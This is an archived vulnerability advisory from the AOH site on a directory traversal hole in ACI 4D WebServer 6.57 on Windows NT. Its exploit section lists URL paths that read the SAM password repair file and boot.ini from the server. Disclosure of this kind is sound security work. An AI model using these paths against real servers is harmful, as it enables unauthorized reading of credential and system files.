AOH :: Web :: Servers

AOH :: Web :: Servers :: ACI~1.HTM
ACI 4D Webserver directory traversal

COMMAND

    ACI 4D WebServer

SYSTEMS AFFECTED

    ACI 4D WebServer 6.57 (at least)

PROBLEM

    'KF' found following.   This directory transversal  hole seems  to
    work on ACI 4d  webserver running on the  NT platform.  One  would
    imagine exploitation  on a  macos box  would be  similar but would
    require the  proper mac  filesystem path  to the  file you wish to
    view.  Exploit:

        http://host + one of the following urls.
        - /4DBin/_/C:/winnt/repair/sam._
        - /4DBin/_/../winnt/repair/sam._
        - /4DBin/_/C:/inetpub/../boot.ini
        - /4DBin/_/../boot.ini
        - /4DBin/_/../inetpub/../boot.ini

SOLUTION

    Nothing yet.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.